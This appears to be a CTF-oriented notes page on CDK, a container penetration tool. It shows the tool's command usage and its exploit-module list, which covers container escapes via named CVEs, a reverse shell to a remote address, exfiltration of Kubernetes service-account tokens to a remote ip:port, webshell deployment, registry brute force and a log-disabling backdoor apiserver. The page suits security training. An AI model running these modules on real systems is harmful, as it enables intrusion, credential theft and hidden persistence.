CDK is a container penetration script.

This tool is really useful for CTFs where you gain a reverse shell inside a docker container, since it will first enumerate the possible vulnerabilities it is vulnerable to, and then allow you to exploit them.


Even though it is a easy tool to use, it can get hard when you need to modify some payload to make it work.

Evaluate container
cdk evaluate --full
Get possible exploits
cdk run --list
Exploit the vulnerability
cdk run [script-name] [options]


cdk run --list
k8s-cronjob             create cronjob with user specified image and cmd. Usage: cdk run k8s-cronjob (default|anonymous|[token-path]) (min|hour|day|[cron-expr]) [image] [args]
k8s-shadow-apiserver    duplicate kube-apiserver pod, disable logs and grant all privilege to anonymous user. usage: cdk run k8s-shadow-apiserver (default|anonymous|[service-account-token-path])
cap-dac-read-search     Read files from host or chroot to host and spawn a cmd. The First argument is file bind-mounted to container from host (default: /etc/hostname), the second argument specifies which file to read (default: /etc/shadow), the third and remaining arguments specifies command executed in host root filesystem (default: /bin/bash). If there is one argument, the first argument is the target file to read. When second argument is "/", this exploit will spawn a cmd.
k8s-configmap-dump      try to dump K8s configmap in multiple ways, usage: cdk run k8s-configmap-dump (auto|[service-account-token-path])
service-probe           scan subnet to find Docker/K8s inner services, usage: cdk run service-probe
docker-sock-pwn         Create and run [cmd] in a container with host root `/` mounted to container `/host` usage: ./cdk docker-sock-deploy [sock_path] [shell_cmd] example: ./cdk docker-sock-pwn /var/run/docker.sock "touch /host/tmp/pwn-success"
k8s-psp-dump            Dump K8S Pod Security Policies and try, usage: cdk run k8s-psp-dump (auto|[service-account-token-path])
shim-pwn                pwn CVE-2020-15257,start a privileged reverse shell to remote host or execute cmd. usage: "./cdk shim-pwn reverse [RHOST] [RPORT]" or "./cmd shim-pwn [SHELL_CMD]"
k8s-backdoor-daemonset  deploy image to every node using daemonset, usage: cdk run k8s-backdoor-daemonset (default|anonymous|[service-account-token-path]) [image] [cmd]
k8s-get-sa-token        Dump target service-account token and send it to remote ip:port, usage: cdk run k8s-get-sa-token (default|anonymous|[service-account-token-path]) [target-service-account] [ip] [port]
mount-disk              escape privileged container via disk mount, usage: `./cdk run mount-disk`
runc-pwn                container escape via CVE-2019-5736. usage: ./cdk runc-pwn [shell-cmd]
webshell-deploy         Write webshell to target path. Usage: cdk run webshell-deploy (php|jsp) [filepath].
ak-leakage              search AK/Secrets from input dir, usage: cdk run ak-leakage [dir]
registry-brute          To container image registry, brute force the accounts and passwords cracking. Usage: ./cdk registry-brute [registry-url] [username|file] [password|file]. Example: ./cdk registry-brute root,admin /tmp/passwordfile.
k8s-secret-dump         try to dump K8s secret in multiple ways, usage: cdk run k8s-secret-dump (auto|[service-account-token-path])
lxcfs-rw                escape container when root has LXCFS read & write privilege,  usage: `./cdk run lxcfs-rw`
reverse-shell           reverse shell to remote addr, usage: cdk run reverse-shell [ip:port]
mount-cgroup            escape privileged container via cgroup. usage: ./cdk run mount-cgroup "shell-cmd-payloads"
k8s-mitm-clusterip      Exploit CVE-2020-8554: Man in the middle using ExternalIPs, usage: cdk run k8s-mitm-clusterip (default|anonymous|[service-account-token-path]) [image] [ip] [port]
mount-procfs            escape container via mounted procfs. usage: cdk run mount-procfs [dir] "[shell-payload]"
rewrite-cgroup-devices  escape sys_admin capabilities container via rewrite cgroup devices.allow. usage: ./cdk run rewrite-cgroup-devices.
docker-sock-check       check if docker unix socket available. usage: ./cdk docker-sock-check [sock_path]
test-poc                this is the test script
check-ptrace            check if pid injection works with cap=SYS_PTRACE. usage: ./cdk run check-ptrace
istio-check             Check was the shell in a istio(service mesh) network, please note that this feature will request Usage: cdk run istio-check.
docker-api-pwn          Create and run [cmd] in a container with host `/` mounted to `/host`. usage: ./cdk run docker-api-pwn "touch /host/tmp/pwn-success"